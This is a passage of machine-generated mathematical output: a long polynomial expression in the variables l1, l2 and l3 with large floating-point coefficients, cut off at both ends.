6.19620471230146e+30*l1**4*l2**17*l3**4 - 1.32036189615904e+29*l1**4*l2**17*l3**3 + 2.09331677751695e+29*l1**4*l2**17*l3**2 + 1.10784450644757e+27*l1**4*l2**17*l3 - 3.29939028640129e+26*l1**4*l2**17 + 7.90400854497206e+33*l1**4*l2**16*l3**8 + 1.33603714081299e+34*l1**4*l2**16*l3**7 + 1.66089203392466e+31*l1**4*l2**16*l3**6 - 4.76557078920048e+31*l1**4*l2**16*l3**5 - 6.7914240485447e+28*l1**4*l2**16*l3**4 - 2.98072291914732e+29*l1**4*l2**16*l3**3 - 1.940232360144e+27*l1**4*l2**16*l3**2 + 1.03128997371138e+27*l1**4*l2**16*l3 + 6.79778581764484e+24*l1**4*l2**16 - 1.45799409310567e+34*l1**4*l2**15*l3**9 - 1.87115812565981e+34*l1**4*l2**15*l3**8 + 4.87068993055256e+31*l1**4*l2**15*l3**7 + 1.17798243068047e+32*l1**4*l2**15*l3**6 + 3.19629108735464e+29*l1**4*l2**15*l3**5 + 2.23184760184777e+29*l1**4*l2**15*l3**4 - 2.9463360884832e+26*l1**4*l2**15*l3**3 - 2.38761706485444e+27*l1**4*l2**15*l3**2 - 5.38492986504867e+24*l1**4*l2**15*l3 + 3.58051780611677e+24*l1**4*l2**15 + 1.62430659982447e+34*l1**4*l2**14*l3**10 + 2.23212572869642e+34*l1**4*l2**14*l3**9 - 1.33806251516792e+32*l1**4*l2**14*l3**8 - 1.98990608185618e+32*l1**4*l2**14*l3**7 - 1.52476578383282e+29*l1**4*l2**14*l3**6 + 1.6527315684321e+29*l1**4*l2**14*l3**5 + 1.6186606489817e+27*l1**4*l2**14*l3**4 + 2.86022235538354e+27*l1**4*l2**14*l3**3 + 1.35308953345647e+25*l1**4*l2**14*l3**2 - 7.8428208364268e+24*l1**4*l2**14*l3 - 4.89866059545675e+22*l1**4*l2**14 - 1.03685100058034e+34*l1**4*l2**13*l3**11 - 2.3659628200032e+34*l1**4*l2**13*l3**10 + 1.7571751960803e+32*l1**4*l2**13*l3**9 + 2.66382356919084e+32*l1**4*l2**13*l3**8 - 2.63575274115881e+29*l1**4*l2**13*l3**7 - 7.70381367438492e+29*l1**4*l2**13*l3**6 - 4.8278294004116e+27*l1**4*l2**13*l3**5 - 2.32834078552842e+27*l1**4*l2**13*l3**4 + 1.60659958317094e+25*l1**4*l2**13*l3**3 + 1.79221692010506e+25*l1**4*l2**13*l3**2 - 1.10697889670512e+22*l1**4*l2**13*l3 - 2.48260528282187e+22*l1**4*l2**13 - 2.56273765975738e+33*l1**4*l2**12*l3**12 + 2.29662452459863e+34*l1**4*l2**12*l3**11 - 1.06052242492239e+32*l1**4*l2**12*l3**10 - 3.00378305277945e+32*l1**4*l2**12*l3**9 + 6.72836380908299e+29*l1**4*l2**12*l3**8 + 1.42073600081151e+30*l1**4*l2**12*l3**7 + 1.99932626227257e+27*l1**4*l2**12*l3**6 - 7.74012329389104e+26*l1**4*l2**12*l3**5 - 7.55049825303244e+24*l1**4*l2**12*l3**4 - 1.57634808453316e+25*l1**4*l2**12*l3**3 - 8.22263230014828e+22*l1**4*l2**12*l3**2 + 2.84536060836805e+22*l1**4*l2**12*l3 + 2.879794387934e+20*l1**4*l2**12 + 1.62791985048945e+34*l1**4*l2**11*l3**13 - 2.1280529790368e+34*l1**4*l2**11*l3**12 - 5.71372193592878e+31*l1**4*l2**11*l3**11 + 3.02162322325661e+32*l1**4*l2**11*l3**10 - 3.1263045122918e+29*l1**4*l2**11*l3**9 - 1.84206209118661e+30*l1**4*l2**11*l3**8 - 2.5091036109052e+27*l1**4*l2**11*l3**7 + 3.80314946454092e+27*l1**4*l2**11*l3**6 + 4.55484133394837e+25*l1**4*l2**11*l3**5 + 1.58993814192697e+25*l1**4*l2**11*l3**4 - 1.7169871747995e+23*l1**4*l2**11*l3**3 - 7.99712319560571e+22*l1**4*l2**11*l3**2 + 2.47386409607131e+20*l1**4*l2**11*l3 + 1.27522090639318e+20*l1**4*l2**11 - 2.53270648878618e+34*l1**4*l2**10*l3**14 + 1.89642233472582e+34*l1**4*l2**10*l3**13 + 2.42489787562001e+32*l1**4*l2**10*l3**12 - 2.80107260499182e+32*l1**4*l2**10*l3**11 - 6.56395360236039e+29*l1**4*l2**10*l3**10 + 1.99516745938164e+30*l1**4*l2**10*l3**9 + 4.93115770364651e+26*l1**4*l2**10*l3**8 - 7.19611379207578e+27*l1**4*l2**10*l3**7 - 4.90125338116671e+24*l1**4*l2**10*l3**6 + 4.12219806175012e+24*l1**4*l2**10*l3**5 - 6.70424365937859e+22*l1**4*l2**10*l3**4 + 2.2018186409706e+22*l1**4*l2**10*l3**3 + 6.16062743850779e+20*l1**4*l2**10*l3**2 - 3.05753394244604e+19*l1**4*l2**10*l3 - 1.29406428414196e+18*l1**4*l2**10 + 2.60856658049265e+34*l1**4*l2**9*l3**15 - 1.61338873235866e+34*l1**4*l2**9*l3**14 - 3.46031642390848e+32*l1**4*l2**9*l3**13 + 2.44645330129692e+32*l1**4*l2**9*l3**12 + 1.836097991212e+30*l1**4*l2**9*l3**11 - 1.87009454990754e+30*l1**4*l2**9*l3**10 - 6.48992076508176e+27*l1**4*l2**9*l3**9 + 7.94976479108238e+27*l1**4*l2**9*l3**8 + 4.41723428871749e+25*l1**4*l2**9*l3**7 - 7.74496540950729e+24*l1**4*l2**9*l3**6 - 2.93946205836373e+23*l1**4*l2**9*l3**5 - 6.24540740620978e+22*l1**4*l2**9*l3**4 + 1.01434605832802e+21*l1**4*l2**9*l3**3 + 2.91921351449001e+20*l1**4*l2**9*l3**2 - 1.39157905549679e+18*l1**4*l2**9*l3 - 4.85081904820804e+17*l1**4*l2**9 - 2.06799540731218e+34*l1**4*l2**8*l3**16 + 1.25382039320068e+34*l1**4*l2**8*l3**15 + 3.3678407842716e+32*l1**4*l2**8*l3**14 - 1.96428928230609e+32*l1**4*l2**8*l3**13 - 2.30978219043956e+30*l1**4*l2**8*l3**12 + 1.5845778956414e+30*l1**4*l2**8*l3**11 + 7.90565133957132e+27*l1**4*l2**8*l3**10 - 8.20851440994266e+27*l1**4*l2**8*l3**9 - 4.1939013510016e+24*l1**4*l2**8*l3**8 + 2.43582458219762e+25*l1**4*l2**8*l3**7 - 1.24851656617946e+23*l1**4*l2**8*l3**6 - 5.29521827902374e+22*l1**4*l2**8*l3**5 + 9.78834288493899e+20*l1**4*l2**8*l3**4 + 1.23040494420873e+20*l1**4*l2**8*l3**3 - 2.89699970990621e+18*l1**4*l2**8*l3**2 - 8.8250756368037e+16*l1**4*l2**8*l3 + 2.69509395347583e+15*l1**4*l2**8 + 1.27644515748609e+34*l1**4*l2**7*l3**17 - 8.59325428157564e+33*l1**4*l2**7*l3**16 - 2.41606427034945e+32*l1**4*l2**7*l3**15 + 1.39569154080588e+32*l1**4*l2**7*l3**14 + 2.0107415200284e+30*l1**4*l2**7*l3**13 - 1.1517066480106e+30*l1**4*l2**7*l3**12 - 1.04921055363235e+28*l1**4*l2**7*l3**11 + 6.20385786130304e+27*l1**4*l2**7*l3**10 + 4.69343261667244e+25*l1**4*l2**7*l3**9 - 1.60187462339896e+25*l1**4*l2**7*l3**8 - 2.94903586436417e+23*l1**4*l2**7*l3**7 - 1.2895960237868e+22*l1**4*l2**7*l3**6 + 1.47041048690118e+21*l1**4*l2**7*l3**5 + 2.69871581949608e+20*l1**4*l2**7*l3**4 - 4.05261980738601e+18*l1**4*l2**7*l3**3 - 9.30032107059811e+17*l1**4*l2**7*l3**2 + 3.68595802511785e+15*l1**4*l2**7*l3 + 807385600454523.0*l1**4*l2**7 - 6.28075139305657e+33*l1**4*l2**6*l3**18 + 4.94080075549093e+33*l1**4*l2**6*l3**17 + 1.32620098012706e+32*l1**4*l2**6*l3**16 - 8.19107547226416e+31*l1**4*l2**6*l3**15 - 1.17326777967695e+30*l1**4*l2**6*l3**14 + 6.82367211349459e+29*l1**4*l2**6*l3**13 + 5.30269367220986e+27*l1**4*l2**6*l3**12 - 4.31765571796513e+27*l1**4*l2**6*l3**11 + 3.64592044912004e+23*l1**4*l2**6*l3**10 + 1.93294090078183e+25*l1**4*l2**6*l3**9 - 1.48250372103452e+23*l1**4*l2**6*l3**8 - 8.0238455348783e+22*l1**4*l2**6*l3**7 + 1.18611423798047e+21*l1**4*l2**6*l3**6 + 2.92118467256218e+20*l1**4*l2**6*l3**5 - 4.26317358168895e+18*l1**4*l2**6*l3**4 - 6.15491195191495e+17*l1**4*l2**6*l3**3 + 5.95647179051194e+15*l1**4*l2**6*l3**2 + 419965988908202.0*l1**4*l2**6*l3 - 1907690544755.49*l1**4*l2**6 + 2.37447306517622e+33*l1**4*l2**5*l3**19 - 2.2932185891122e+33*l1**4*l2**5*l3**18 - 5.41116342897215e+31*l1**4*l2**5*l3**17 + 3.64284248227489e+31*l1**4*l2**5*l3**16 + 4.68224185501655e+29*l1**4*l2**5*l3**15 - 2.60192126316512e+29*l1**4*l2**5*l3**14 - 2.15590324828663e+27*l1**4*l2**5*l3**13 + 1.54090324649623e+27*l1**4*l2**5*l3**12 + 9.74031169866823e+24*l1**4*l2**5*l3**11 - 4.33068663030346e+24*l1**4*l2**5*l3**10 - 1.48069267269814e+23*l1**4*l2**5*l3**9 - 7.84765482285139e+21*l1**4*l2**5*l3**8 + 1.20638597643989e+21*l1**4*l2**5*l3**7 + 1.90804971468911e+20*l1**4*l2**5*l3**6 - 4.70640443697911e+18*l1**4*l2**5*l3**5 - 8.70554256436114e+17*l1**4*l2**5*l3**4 + 7.87666188979119e+15*l1**4*l2**5*l3**3 + 1.29726051546003e+15*l1**4*l2**5*l3**2 - 3113350969040.9*l1**4*l2**5*l3 - 329648926133.784*l1**4*l2**5 - 7.27228532483993e+32*l1**4*l2**4*l3**20 + 7.90584091433694e+32*l1**4*l2**4*l3**19 + 1.69250345896724e+31*l1**4*l2**4*l3**18 - 9.59526295097703e+30*l1**4*l2**4*l3**17 - 7.59552407608082e+28*l1**4*l2**4*l3**16 + 7.4046845625413e+27*l1**4*l2**4*l3**15 - 1.62271447723635e+27*l1**4*l2**4*l3**14 + 2.87015047734734e+25*l1**4*l2**4*l3**13 + 2.87552218397412e+25*l1**4*l2**4*l3**12 + 1.49264549046201e+24*l1**4*l2**4*l3**11 - 2.20006000570129e+23*l1**4*l2**4*l3**10 - 3.60245283971773e+22*l1**4*l2**4*l3**9 + 1.16476063076482e+21*l1**4*l2**4*l3**8 + 2.41543555537461e+20*l1**4*l2**4*l3**7 - 4.18746231274088e+18*l1**4*l2**4*l3**6 - 7.71710031251537e+17*l1**4*l2**4*l3**5 + 7.67598231192972e+15*l1**4*l2**4*l3**4 + 1.07139904370997e+15*l1**4*l2**4*l3**3 - 4349534442042.42*l1**4*l2**4*l3**2 - 309045868250.383*l1**4*l2**4*l3 - 115029479.497574*l1**4*l2**4 + 1.86290885430541e+32*l1**4*l2**3*l3**21 - 1.75432708784954e+32*l1**4*l2**3*l3**20 - 4.63768566284682e+30*l1**4*l2**3*l3**19 - 6.23403223688128e+29*l1**4*l2**3*l3**18 - 5.14187408243305e+27*l1**4*l2**3*l3**17 + 8.14296719676398e+28*l1**4*l2**3*l3**16 + 1.32609412602932e+27*l1**4*l2**3*l3**15 - 9.24280530952415e+26*l1**4*l2**3*l3**14 - 1.55304715878082e+25*l1**4*l2**3*l3**13 + 6.49884182400969e+24*l1**4*l2**3*l3**12 + 4.80422271726793e+22*l1**4*l2**3*l3**11 - 2.76956043071086e+22*l1**4*l2**3*l3**10 + 2.87146983757024e+20*l1**4*l2**3*l3**9 + 1.30573118757167e+20*l1**4*l2**3*l3**8 - 2.56900371926981e+18*l1**4*l2**3*l3**7 - 5.49221046413404e+17*l1**4*l2**3*l3**6 + 6.85662149120904e+15*l1**4*l2**3*l3**5 + 1.04376924675805e+15*l1**4*l2**3*l3**4 - 5188918281734.68*l1**4*l2**3*l3**3 - 515076447084.019*l1**4*l2**3*l3**2 - 828212252.382887*l1**4*l2**3*l3 - 262267213.254582*l1**4*l2**3 - 5.700536429121e+31*l1**4*l2**2*l3**22 + 9.19516263108705e+30*l1**4*l2**2*l3**21 + 1.70743942096512e+30*l1**4*l2**2*l3**20 + 1.93241045486629e+30*l1**4*l2**2*l3**19 + 4.70203676588562e+27*l1**4*l2**2*l3**18 - 6.31474616704207e+28*l1**4*l2**2*l3**17 - 1.01828569050592e+27*l1**4*l2**2*l3**16 + 7.00165672596485e+26*l1**4*l2**2*l3**15 + 1.76243156697157e+25*l1**4*l2**2*l3**14 - 4.25581619033467e+24*l1**4*l2**2*l3**13 - 1.59617714975098e+23*l1**4*l2**2*l3**12 + 4.94082854134244e+21*l1**4*l2**2*l3**11 + 8.67023382140761e+20*l1**4*l2**2*l3**10 + 7.22898316268722e+19*l1**4*l2**2*l3**9 - 2.88443542329228e+18*l1**4*l2**2*l3**8 - 3.93609455481425e+17*l1**4*l2**2*l3**7 + 5.51665712792036e+15*l1**4*l2**2*l3**6 + 843768295488435.0*l1**4*l2**2*l3**5 - 4349534442042.35*l1**4*l2**2*l3**4 - 515076447083.938*l1**4*l2**2*l3**3 - 276070750.794211*l1**4*l2**2*l3**2 - 41410612.619124*l1**4*l2**2*l3 - 727920.924946217*l1**4*l2**2 + 1.57442425594868e+31*l1**4*l2*l3**23 + 6.6942056012387e+30*l1**4*l2*l3**22 - 6.84172477726512e+29*l1**4*l2*l3**21 - 8.63682028420122e+29*l1**4*l2*l3**20 + 6.80370136574655e+27*l1**4*l2*l3**19 + 2.62438654217679e+28*l1**4*l2*l3**18 + 1.86915218928019e+26*l1**4*l2*l3**17 - 3.49399325005896e+26*l1**4*l2*l3**16 - 4.02115233734136e+24*l1**4*l2*l3**15 + 3.0205065789026e+24*l1**4*l2*l3**14 + 3.26129310374009e+22*l1**4*l2*l3**13 - 1.60918614513978e+22*l1**4*l2*l3**12 - 8.16723968732136e+19*l1**4*l2*l3**11 + 6.40933702238751e+19*l1**4*l2*l3**10 - 3.25955456357595e+17*l1**4*l2*l3**9 - 2.04304951920708e+17*l1**4*l2*l3**8 + 2.2765613901237e+15*l1**4*l2*l3**7 + 384265382846644.0*l1**4*l2*l3**6 - 3113350969040.75*l1**4*l2*l3**5 - 309045868250.389*l1**4*l2*l3**4 - 184047167.196166*l1**4*l2*l3**3 - 165642450.476648*l1**4*l2*l3**2 + 2911683.69978427*l1**4*l2*l3 + 1310257.664903*l1**4*l2 - 2.87222635984225e+30*l1**4*l3**24 - 1.59915871844996e+30*l1**4*l3**23 + 1.39928211794363e+29*l1**4*l3**22 + 1.55939137566313e+29*l1**4*l3**21 - 1.72556319383117e+27*l1**4*l3**20 - 4.92007391289801e+27*l1**4*l3**19 - 7.2713862268596e+25*l1**4*l3**18 + 6.72951782701245e+25*l1**4*l3**17 + 2.11543225756537e+24*l1**4*l3**16 - 5.4061993561907e+23*l1**4*l3**15 - 2.9115276356606e+22*l1**4*l3**14 + 1.44270342591004e+21*l1**4*l3**13 + 2.19484649898803e+20*l1**4*l3**12 + 7.37926688947019e+18*l1**4*l3**11 - 9.18299364761643e+17*l1**4*l3**10 - 6.96874585574734e+16*l1**4*l3**9 + 2.11731496642168e+15*l1**4*l3**8 + 271679153838375.0*l1**4*l3**7 - 1907690544755.41*l1**4*l3**6 - 329648926133.721*l1**4*l3**5 - 207053063.095703*l1**4*l3**4 - 13803537.5397175*l1**4*l3**3 + 1455841.84989212*l1**4*l3**2 + 327564.41622574*l1**4*l3 + 4776.98106995886*l1**4 - 2.35229786236642e+30*l1**3*l2**25 + 5.39110325538057e+30*l1**3*l2**24*l3 - 1.20391210337852e+30*l1**3*l2**24 + 4.28057636756803e+31*l1**3*l2**23*l3**2 + 3.91612163438601e+30*l1**3*l2**23*l3 + 2.93382519393052e+29*l1**3*l2**23 - 2.96197712377545e+32*l1**3*l2**22*l3**3 + 2.05301086610093e+31*l1**3*l2**22*l3**2 - 1.07416205473493e+30*l1**3*l2**22*l3 + 1.42828501676262e+29*l1**3*l2**22 + 9.84704191423313e+32*l1**3*l2**21*l3**4 - 2.01094208845081e+32*l1**3*l2**21*l3**3 + 1.2646833380359e+30*l1**3*l2**21*l3**2 - 6.737872703529e+29*l1**3*l2**21*l3 - 1.11786350370885e+28*l1**3*l2**21 - 2.02504577992603e+33*l1**3*l2**20*l3**5 + 8.65444708941133e+32*l1**3*l2**20*l3**4 + 3.32083739888826e+30*l1**3*l2**20*l3**3 + 1.21493209296624e+30*l1**3*l2**20*l3**2 + 3.74105873163483e+28*l1**3*l2**20*l3 - 5.32041695002341e+27*l1**3*l2**20 + 2.56998132377561e+33*l1**3*l2**19*l3**6 - 2.50118418307563e+33*l1**3*l2**19*l3**5 - 1.66328406529202e+31*l1**3*l2**19*l3**4 + 1.36965219917627e+30*l1**3*l2**19*l3**3 - 6.84730212187247e+28*l1**3*l2**19*l3**2 + 2.35368530358584e+28*l1**3*l2**19*l3 + 1.87327278404516e+26*l1**3*l2**19 - 7.05739837204822e+32*l1**3*l2**18*l3**7 + 5.49316017158553e+33*l1**3*l2**18*l3**6 + 3.22043740491244e+31*l1**3*l2**18*l3**5 - 1.44978681423231e+31*l1**3*l2**18*l3**4 + 2.74773678224994e+28*l1**3*l2**18*l3**3 - 5.55258529654996e+28*l1**3*l2**18*l3**2 - 4.50466255747828e+26*l1**3*l2**18*l3 + 9.1566203496743e+25*l1**3*l2**18 - 5.59838814684021e+33*l1**3*l2**17*l3**8 - 9.60934473916576e+33*l1**3*l2**17*l3**7 - 2.39452121843543e+31*l1**3*l2**17*l3**6 + 4.7235361542522e+31*l1**3*l2**17*l3**5 + 9.84650579547746e+28*l1**3*l2**17*l3**4 + 5.40462141240705e+28*l1**3*l2**17*l3**3 + 7.43722127565787e+26*l1**3*l2**17*l3**2 - 3.28435548380857e+26*l1**3*l2**17*l3 - 2.21636873890082e+24*l1**3*l2**17 + 1.72393751956456e+34*l1**3*l2**16*l3**9 + 1.37396718666623e+34*l1**3*l2**16*l3**8 - 4.85410605484956e+31*l1**3*l2**16*l3**7 - 1.02063052442476e+32*l1**3*l2**16*l3**6 - 1.89281962141299e+29*l1**3*l2**16*l3**5 + 6.83758818874324e+28*l1**3*l2**16*l3**4 - 7.17732309296775e+24*l1**3*l2**16*l3**3 + 7.29122213814519e+26*l1**3*l2**16*l3**2 + 3.2988066902924e+24*l1**3*l2**16*l3 - 1.07824779006632e+24*l1**3*l2**16 - 3.24909072621069e+34*l1**3*l2**15*l3**10 - 1.61098249822449e+34*l1**3*l2**15*l3**9 + 2.11040084159398e+32*l1**3*l2**15*l3**8 + 1.65973695258204e+32*l1**3*l2**15*l3**7 - 1.49834873655294e+29*l1**3*l2**15*l3**6 - 3.97350630187604e+29*l1**3*l2**15*l3**5 - 8.51927744121232e+26*l1**3*l2**15*l3**4 - 7.05162387204853e+26*l1**3*l2**15*l3**3 - 5.85428240359493e+24*l1**3*l2**15*l3**2 + 2.92989341659408e+24*l1**3*l2**15*l3 + 1.71430784110893e+22*l1**3*l2**15 + 4.76332947268942e+34*l1**3*l2**14*l3**11 + 1.52362345585817e+34*l1**3*l2**14*l3**10 - 4.4908282441844e+32*l1**3*l2**14*l3**9 - 2.11705374516323e+32*l1**3*l2**14*l3**8 + 1.2493417939631e+30*l1**3*l2**14*l3**7 + 8.83194470906869e+29*l1**3*l2**14*l3**6 + 9.73036842024547e+26*l1**3*l2**14*l3**5 - 2.15863403365341e+26*l1**3*l2**14*l3**4 - 2.74435720944937e+24*l1**3*l2**14*l3**3 - 6.28855895160195e+24*l1**3*l2**14*l3**2 - 7.55960220591976e+21*l1**3*l2**14*l3 + 8.04602252132235e+21*l1**3*l2**14 - 5.81093794531802e+34*l1**3*l2**13*l3**12 - 1.07880700927287e+34*l1**3*l2**13*l3**11 + 6.99047154902026e+32*l1**3*l2**13*l3**10 + 2.10927312839132e+32*l1**3*l2**13*l3**9 - 3.15970301701345e+30*l1**3*l2**13*l3**8 - 1.32617101756317e+30*l1**3*l2**13*l3**7 + 3.68934492204568e+27*l1**3*l2**13*l3**6 + 2.46709015784568e+27*l1**3*l2**13*l3**5 + 2.62322580037733e+24*l1**3*l2**13*l3**4 + 5.45038283940835e+24*l1**3*l2**13*l3**3 + 3.05897800900814e+22*l1**3*l2**13*l3**2 - 1.3340103985638e+22*l1**3*l2**13*l3 - 1.09545374380453e+20*l1**3*l2**13 + 6.09654325032564e+34*l1**3*l2**12*l3**13 + 4.03166085179397e+33*l1**3*l2**12*l3**12 - 8.80948358268668e+32*l1**3*l2**12*l3**11 - 1.54054184579694e+32*l1**3*l2**12*l3**10 + 5.33509552427085e+30*l1**3*l2**12*l3**9 + 1.4446599031344e+30*l1**3*l2**12*l3**8 - 1.25934972804053e+28*l1**3*l2**12*l3**7 - 4.82935378907292e+27*l1**3*l2**12*l3**6 - 3.3803396555491e+24*l1**3*l2**12*l3**5 - 1.95026338274561e+24*l1**3*l2**12*l3**4 + 4.33093030322589e+22*l1**3*l2**12*l3**3 + 2.98034637392858e+22*l1**3*l2**12*l3**2 - 2.87167398368944e+19*l1**3*l2**12*l3 - 4.51333277413767e+19*l1**3*l2**12 - 5.55614168488802e+34*l1**3*l2**11*l3**14 + 2.82632222614957e+33*l1**3*l2**11*l3**13 + 9.32317377128515e+32*l1**3*l2**11*l3**12 + 5.81819023321528e+31*l1**3*l2**11*l3**11 - 7.01540840958642e+30*l1**3*l2**11*l3**10 - 1.1075189414296e+30*l1**3*l2**11*l3**9 + 2.523285101305e+28*l1**3*l2**11*l3**8 + 6.10566394438735e+27*l1**3*l2**11*l3**7 - 3.25370107116981e+25*l1**3*l2**11*l3**6 - 8.03887301682633e+24*l1**3*l2**11*l3**5 + 2.0794898912507e+22*l1**3*l2**11*l3**4 - 1.25855456824e+22*l1**3*l2**11*l3**3 - 2.17433812395411e+20*l1**3*l2**11*l3**2 + 3.15115703392472e+19*l1**3*l2**11*l3 + 5.65217569134113e+17*l1**3*l2**11 + 4.41037979806507e+34*l1**3*l2**10*l3**15 - 7.63903127690556e+33*l1**3*l2**10*l3**14 - 8.42965060737092e+32*l1**3*l2**10*l3**13 + 4.00356763619207e+31*l1**3*l2**10*l3**12 + 7.50876663259341e+30*l1**3*l2**10*l3**11 + 4.20203851819899e+29*l1**3*l2**10*l3**10 - 3.46128182675897e+28*l1**3*l2**10*l3**9 - 4.79723102749473e+27*l1**3*l2**10*l3**8 + 6.53491633581114e+25*l1**3*l2**10*l3**7 + 1.19898018230149e+25*l1**3*l2**10*l3**6 + 2.46745906233706e+22*l1**3*l2**10*l3**5 + 1.25920642168935e+22*l1**3*l2**10*l3**4 - 2.7341069749995e+20*l1**3*l2**10*l3**3 - 1.12162958016938e+20*l1**3*l2**10*l3**2 + 2.88107056311658e+17*l1**3*l2**10*l3 + 1.99386477032854e+17*l1**3*l2**10 - 3.01716829095993e+34*l1**3*l2**9*l3**16 + 9.39505747089347e+33*l1**3*l2**9*l3**15 + 6.5047353153421e+32*l1**3*l2**9*l3**14 - 1.06072160318306e+32*l1**3*l2**9*l3**13 - 6.70376547971511e+30*l1**3*l2**9*l3**12 + 2.98030880130107e+29*l1**3*l2**9*l3**11 + 3.84068051744089e+28*l1**3*l2**9*l3**10 + 1.79702790117975e+27*l1**3*l2**9*l3**9 - 1.14358120473622e+26*l1**3*l2**9*l3**8 - 1.27025937988743e+25*l1**3*l2**9*l3**7 + 1.82372187091844e+23*l1**3*l2**9*l3**6 + 2.47791308158912e+22*l1**3*l2**9*l3**5 - 3.56405884370719e+20*l1**3*l2**9*l3**4 - 1.53519418755438e+19*l1**3*l2**9*l3**3 + 1.16416565928422e+18*l1**3*l2**9*l3**2 - 5.35371510453252e+16*l1**3*l2**9*l3 - 1.35531681521058e+15*l1**3*l2**9 + 1.75374406123345e+34*l1**3*l2**8*l3**17 - 8.41927081037929e+33*l1**3*l2**8*l3**16 - 4.24843519015794e+32*l1**3*l2**8*l3**15 + 1.24311796841942e+32*l1**3*l2**8*l3**14 + 4.96627534353902e+30*l1**3*l2**8*l3**13 - 7.51715791978048e+29*l1**3*l2**8*l3**12 - 3.32887861431997e+28*l1**3*l2**8*l3**11 + 1.66608065291528e+27*l1**3*l2**8*l3**10 + 1.1778599893536e+26*l1**3*l2**8*l3**9 + 2.11129511274549e+24*l1**3*l2**8*l3**8 - 1.64913047270065e+23*l1**3*l2**8*l3**7 - 1.8672410303454e+21*l1**3*l2**8*l3**6 - 2.59535005862358e+20*l1**3*l2**8*l3**5 - 8.84986252008944e+19*l1**3*l2**8*l3**4 + 1.29776639633346e+18*l1**3*l2**8*l3**3 + 4.1741869244001e+17*l1**3*l2**8*l3**2 - 1.23313838142271e+15*l1**3*l2**8*l3 - 397592085662180.0*l1**3*l2**8 - 8.41468433433262e+33*l1**3*l2**7*l3**18 + 5.98395197701982e+33*l1**3*l2**7*l3**17 + 2.29690838737248e+32*l1**3*l2**7*l3**16 - 1.03518066070526e+32*l1**3*l2**7*l3**15 - 3.02333795925141e+30*l1**3*l2**7*l3**14 + 8.16965609835905e+29*l1**3*l2**7*l3**13 + 2.37634240889615e+28*l1**3*l2**7*l3**12 - 3.46764333350313e+27*l1**3*l2**7*l3**11 - 1.09507372279127e+26*l1**3*l2**7*l3**10 + 5.24273600377718e+24*l1**3*l2**7*l3**9 + 3.20284098725682e+23*l1**3*l2**7*l3**8 + 9.50310988489049e+21*l1**3*l2**7*l3**7 - 7.16781944826816e+20*l1**3*l2**7*l3**6 - 7.42994652382531e+19*l1**3*l2**7*l3**5 + 1.66863084178526e+18*l1**3*l2**7*l3**4 + 1.26926296239692e+17*l1**3*l2**7*l3**3 - 2.60204824628014e+15*l1**3*l2**7*l3**2 - 48805716520599.4*l1**3*l2**7*l3 + 1068306705063.04*l1**3*l2**7 + 3.22063902734493e+33*l1**3*l2**6*l3**19 - 3.42504815895013e+33*l1**3*l2**6*l3**18 - 9.99923909393012e+31*l1**3*l2**6*l3**17 + 6.57668425865156e+31*l1**3*l2**6*l3**16 + 1.45556473765184e+30*l1**3*l2**6*l3**15 - 6.03444865303512e+29*l1**3*l2**6*l3**14 - 1.26518979382241e+28*l1**3*l2**6*l3**13 + 3.46201051719853e+27*l1**3*l2**6*l3**12 + 6.26438223396147e+25*l1**3*l2**6*l3**11 - 1.14016788057713e+25*l1**3*l2**6*l3**10 - 1.59662276944283e+23*l1**3*l2**6*l3**9 + 3.18040065251121e+22*l1**3*l2**6*l3**8 - 6.39147010599892e+19*l1**3*l2**6*l3**7 - 1.08062935392855e+20*l1**3*l2**6*l3**6 + 1.59894925588116e+18*l1**3*l2**6*l3**5 + 3.93370176772023e+17*l1**3*l2**6*l3**4 - 3.35743196823859e+15*l1**3*l2**6*l3**3 - 669111969994329.0*l1**3*l2**6*l3**2 + 1480367862730.22*l1**3*l2**6*l3 + 199162892872.477*l1**3*l2**6 - 9.19627315797504e+32*l1**3*l2**5*l3**20 + 1.56437701632366e+33*l1**3*l2**5*l3**19 + 3.35840413140823e+31*l1**3*l2**5*l3**18 - 3.17832208711817e+31*l1**3*l2**5*l3**17 - 5.33408442520211e+29*l1**3*l2**5*l3**16 + 3.10762513139142e+29*l1**3*l2**5*l3**15 + 5.05155952837658e+27*l1**3*l2**5*l3**14 - 2.07197508378278e+27*l1**3*l2**5*l3**13 - 3.02387413645229e+25*l1**3*l2**5*l3**12 + 7.79389266871292e+24*l1**3*l2**5*l3**11 + 1.43215190121957e+23*l1**3*l2**5*l3**10 - 1.77148244288076e+22*l1**3*l2**5*l3**9 - 5.68928661653345e+20*l1**3*l2**5*l3**8 - 1.64060390740703e+19*l1**3*l2**5*l3**7 + 1.78798613879653e+18*l1**3*l2**5*l3**6 + 2.24399193022457e+17*l1**3*l2**5*l3**5 - 3.49294184958564e+15*l1**3*l2**5*l3**4 - 391456747291380.0*l1**3*l2**5*l3**3 + 2197659507558.21*l1**3*l2**5*l3**2 + 123618347300.067*l1**3*l2**5*l3 + 276070750.79416*l1**3*l2**5 + 1.83125883800276e+32*l1**3*l2**4*l3**21 - 5.49211072367655e+32*l1**3*l2**4*l3**20 - 8.55512232258787e+30*l1**3*l2**4*l3**19 + 1.09609531199898e+31*l1**3*l2**4*l3**18 + 1.35947066607854e+29*l1**3*l2**4*l3**17 - 9.8964456496617e+28*l1**3*l2**4*l3**16 - 9.25889017122187e+26*l1**3*l2**4*l3**15 + 7.31790671415714e+26*l1**3*l2**4*l3**14 + 8.62009817485307e+23*l1**3*l2**4*l3**13 - 3.74500377545104e+24*l1**3*l2**4*l3**12 + 2.90057159538694e+22*l1**3*l2**4*l3**11 + 2.32672235732747e+22*l1**3*l2**4*l3**10 - 2.83465100419495e+20*l1**3*l2**4*l3**9 - 1.10518003347436e+20*l1**3*l2**4*l3**8 + 1.42758267637722e+18*l1**3*l2**4*l3**7 + 3.27474026648966e+17*l1**3*l2**4*l3**6 - 3.42394814608585e+15*l1**3*l2**4*l3**5 - 582078109595745.0*l1**3*l2**4*l3**4 + 2823382006238.04*l1**3*l2**4*l3**3 + 309045868250.513*l1**3*l2**4*l3**2 + 920235835.981084*l1**3*l2**4*l3 + 276070750.794325*l1**3*l2**4 - 2.53402044400845e+31*l1**3*l2**3*l3**22 + 1.38027386886211e+32*l1**3*l2**3*l3**21 + 1.91311949910085e+30*l1**3*l2**3*l3**20 - 2.17632629395825e+30*l1**3*l2**3*l3**19 - 2.75397347634723e+28*l1**3*l2**3*l3**18 + 4.12583165387692e+27*l1**3*l2**3*l3**17 - 7.86635150560386e+25*l1**3*l2**3*l3**16 + 5.1330629209787e+25*l1**3*l2**3*l3**15 + 3.78749632286755e+24*l1**3*l2**3*l3**14 - 8.47334784171875e+23*l1**3*l2**3*l3**13 - 2.47880253383781e+22*l1**3*l2**3*l3**12 + 